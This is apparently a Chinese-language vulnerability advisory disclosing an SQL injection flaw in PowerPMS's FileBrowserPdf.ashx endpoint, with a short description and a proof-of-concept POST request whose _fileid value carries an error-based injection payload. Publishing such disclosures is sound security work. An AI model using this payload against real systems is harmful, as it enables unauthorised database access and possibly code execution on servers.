普华科技-PowerPMS FileBrowserPdf.ashx SQL注入漏洞

日期: 2025-07-24 17:05:43 | 影响软件: PowerPMS | POC: 已公开

漏洞描述

普华科技-PowerPMS FileBrowserPdf.ashx 接口存在SQL注入漏洞,使得攻击者能够获取、修改或删除数据库中的数据,甚至可能执行服务器上的任意代码。

PoC代码

POST /PowerPlat/Control/FileBrowserPdf.ashx HTTP/1.1
Host: 

_fileid=1'and 1<@@VERSION--

相关漏洞推荐